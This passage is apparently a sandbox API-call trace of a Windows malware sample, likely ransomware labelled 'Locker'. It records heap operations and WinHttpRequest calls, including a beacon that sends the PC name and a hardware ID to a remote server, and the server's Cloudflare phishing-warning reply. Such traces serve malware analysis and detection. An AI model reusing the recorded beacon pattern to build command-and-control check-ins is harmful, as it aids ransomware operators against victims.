(This=0xea4524) returned 0x0 [0263.349] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x0, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.349] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.349] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x1, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.349] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xc9b318 [0263.349] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x2, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.349] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xc9b318 [0263.349] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x3, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.349] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.350] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x4, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.350] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.350] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x5, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.350] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.350] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x6, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.350] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.350] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x7, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.350] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.350] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x8, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.350] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.350] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x9, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.350] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.350] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0xa, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.350] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.350] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0xb, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.350] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.350] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0xc, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.350] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.350] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0xd, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.350] ITypeInfo:LocalReleaseTypeAttr (This=0xea4524) returned 0xe4f2d8 [0263.350] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.350] WinHttpRequest:IUnknown:Release (This=0xea4524) returned 0x1 [0263.350] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xe904f8 [0263.351] WinHttpRequest:IDispatch:Invoke (in: This=0xcadc30, dispIdMember=5, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x91f4a0*(rgvarg=([0]=0xe904fc*(varType=0x8, wReserved1=0xe8, wReserved2=0x10, wReserved3=0x0, varVal1="pcname=XDUWTFONO&hwid=6c1Dn9LzXcPIXQWd6eYh&version=Locker", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x91f468, puArgErr=0x91f4b0 | out: pDispParams=0x91f4a0*(rgvarg=([0]=0xe904fc*(varType=0x8, wReserved1=0xe8, wReserved2=0x10, wReserved3=0x0, varVal1="pcname=XDUWTFONO&hwid=6c1Dn9LzXcPIXQWd6eYh&version=Locker", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x91f468*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x91f4b0*=0x2b5995) returned 0x0 [0263.584] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd8da58 | out: hHeap=0xc60000) returned 1 [0263.584] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe191f8 [0263.584] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe192d0 [0263.584] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e80 [0263.584] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca2880 | out: hHeap=0xc60000) returned 1 [0263.584] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1938 | out: hHeap=0xc60000) returned 1 [0263.584] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a708 | out: hHeap=0xc60000) returned 1 [0263.584] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a708 [0263.584] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x80) returned 0xcc6460 [0263.584] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1938 [0263.584] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe904f8 | out: hHeap=0xc60000) returned 1 [0263.584] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0263.585] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b48 | out: hHeap=0xc60000) returned 1 [0263.585] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0263.585] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe191f8 | out: hHeap=0xc60000) returned 1 [0263.585] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a258 | out: hHeap=0xc60000) returned 1 [0263.585] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1ad8 | out: hHeap=0xc60000) returned 1 [0263.585] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a390 | out: hHeap=0xc60000) returned 1 [0263.585] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d550 | out: hHeap=0xc60000) returned 1 [0263.585] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18d8 | out: hHeap=0xc60000) returned 1 [0263.585] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe192d0 | out: hHeap=0xc60000) returned 1 [0263.585] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e80 | out: hHeap=0xc60000) returned 1 [0263.585] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0263.585] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0263.585] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24e80 [0263.585] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0263.585] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24ea0 [0263.585] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0263.585] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d550 [0263.585] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0263.585] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e40 [0263.585] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xd8da58 [0263.585] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1a) returned 0xe9d848 [0263.585] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xcadc30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x91f3b8*="ResponseText", cNames=0x1, lcid=0x800, rgDispId=0x91f4bc | out: rgDispId=0x91f4bc*=9) returned 0x0 [0263.585] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d848 | out: hHeap=0xc60000) returned 1 [0263.585] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xeca3d8 [0263.585] WinHttpRequest:IDispatch:Invoke (in: This=0xcadc30, dispIdMember=9, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x3, pDispParams=0x91f4a0*(rgvarg=0xeca3dc, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x91f488, pExcepInfo=0x91f468, puArgErr=0x91f4b0 | out: pDispParams=0x91f4a0*(rgvarg=0xeca3dc, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x91f488*(varType=0x8, wReserved1=0x7738, wReserved2=0xc, wReserved3=0x0, varVal1="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", varVal2=0xd791a8), pExcepInfo=0x91f468*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x91f4b0*=0x2b5995) returned 0x0 [0263.590] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd8da58 | out: hHeap=0xc60000) returned 1 [0263.590] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe192e8 [0263.590] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1fb0) returned 0xeefb88 [0263.590] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e10 [0263.590] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca3d8 | out: hHeap=0xc60000) returned 1 [0263.591] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0263.591] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e40 | out: hHeap=0xc60000) returned 1 [0263.591] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0263.591] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe192e8 | out: hHeap=0xc60000) returned 1 [0263.591] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d550 | out: hHeap=0xc60000) returned 1 [0263.591] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ea0 | out: hHeap=0xc60000) returned 1 [0263.591] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e80 | out: hHeap=0xc60000) returned 1 [0263.591] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d550 [0263.591] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe192e8 [0263.591] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e80 [0263.591] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe192e8 | out: hHeap=0xc60000) returned 1 [0263.591] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d9d8 [0263.591] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe192e8 [0263.591] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe19048 [0263.591] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0263.591] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0263.591] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9da00 [0263.591] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0263.591] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24ea0 [0263.591] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe19030 [0263.591] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ea0 | out: hHeap=0xc60000) returned 1 [0263.591] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe19060 [0263.591] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24ea0 [0263.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", cchWideChar=4050, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4050 [0263.592] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xfd2) returned 0xef1b40 [0263.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", cchWideChar=4050, lpMultiByteStr=0xef1b40, cbMultiByte=4050, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", lpUsedDefaultChar=0x0) returned 4050 [0263.592] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe19060 | out: hHeap=0xc60000) returned 1 [0263.592] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xfe0) returned 0xeebc20 [0263.592] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1b40 | out: hHeap=0xc60000) returned 1 [0263.592] GetLastError () returned 0x0 [0263.592] SetLastError (dwErrCode=0x0) [0263.592] GetLastError () returned 0x0 [0263.592] SetLastError (dwErrCode=0x0) [0263.592] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xca3ff8, nNumberOfBytesToWrite=0xfd1, lpNumberOfBytesWritten=0x91ddc0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x91ddc0, lpOverlapped=0x0) returned 0 [0263.592] GetLastError () returned 0x6 [0263.592] GetLastError () returned 0x6 [0263.592] SetLastError (dwErrCode=0x6) [0263.592] GetLastError () returned 0x6 [0263.592] SetLastError (dwErrCode=0x6) [0263.592] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeebc20 | out: hHeap=0xc60000) returned 1 [0263.592] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ea0 | out: hHeap=0xc60000) returned 1 [0263.592] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe19030 | out: hHeap=0xc60000) returned 1 [0263.592] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0263.592] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9da00 | out: hHeap=0xc60000) returned 1 [0263.592] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0263.592] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9b0d8 | out: hHeap=0xc60000) returned 1 [0263.592] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcc6460 | out: hHeap=0xc60000) returned 1 [0263.593] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1938 | out: hHeap=0xc60000) returned 1 [0263.593] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a708 | out: hHeap=0xc60000) returned 1 [0263.593] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79dd8 | out: hHeap=0xc60000) returned 1 [0263.593] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a600 | out: hHeap=0xc60000) returned 1 [0263.593] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18c8 | out: hHeap=0xc60000) returned 1 [0263.593] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e050 | out: hHeap=0xc60000) returned 1 [0263.593] WinHttpRequest:IUnknown:Release (This=0xcadc30) returned 0x0 [0263.594] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9b120 | out: hHeap=0xc60000) returned 1 [0263.594] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a498 | out: hHeap=0xc60000) returned 1 [0263.594] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79af0 | out: hHeap=0xc60000) returned 1 [0263.594] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a6d8 | out: hHeap=0xc60000) returned 1 [0263.594] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0263.594] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e1e0 | out: hHeap=0xc60000) returned 1 [0263.594] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1978 | out: hHeap=0xc60000) returned 1 [0263.594] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79e08 | out: hHeap=0xc60000) returned 1 [0263.594] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79bf8 | out: hHeap=0xc60000) returned 1 [0263.594] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a648 | out: hHeap=0xc60000) returned 1 [0263.594] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a618 | out: hHeap=0xc60000) returned 1 [0263.594] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79bc8 | out: hHeap=0xc60000) returned 1 [0263.594] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79d78 | out: hHeap=0xc60000) returned 1 [0263.594] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79be0 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a690 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a6a8 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9b048 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79d60 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f388 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ad8 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a678 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18f8 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeefb88 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e10 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe19048 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe192e8 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d9d8 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e80 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d550 | out: hHeap=0xc60000) returned 1 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ce8 | out: hHeap=0xc60000) returned 1 [0263.595] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.595] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24e80 [0263.595] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d550 [0263.595] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ce8 [0263.595] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24e10 [0263.595] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a678 [0263.595] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e10 | out: hHeap=0xc60000) returned 1 [0263.595] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x16) returned 0xd8da38 [0263.595] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e10 [0263.595] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ad8 [0263.595] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e60 [0263.595] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d9d8 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24ea0 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x44) returned 0xed34e8 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4c) returned 0xe72df8 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d910 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79d60 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e40 [0263.596] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79d60 | out: hHeap=0xc60000) returned 1 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d758 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd79d60 [0263.596] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d9d8 | out: hHeap=0xc60000) returned 1 [0263.596] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24ea0 | out: hHeap=0xc60000) returned 1 [0263.596] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ad8 | out: hHeap=0xc60000) returned 1 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d9d8 [0263.596] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ad8 [0263.596] RtlAllocateHeap 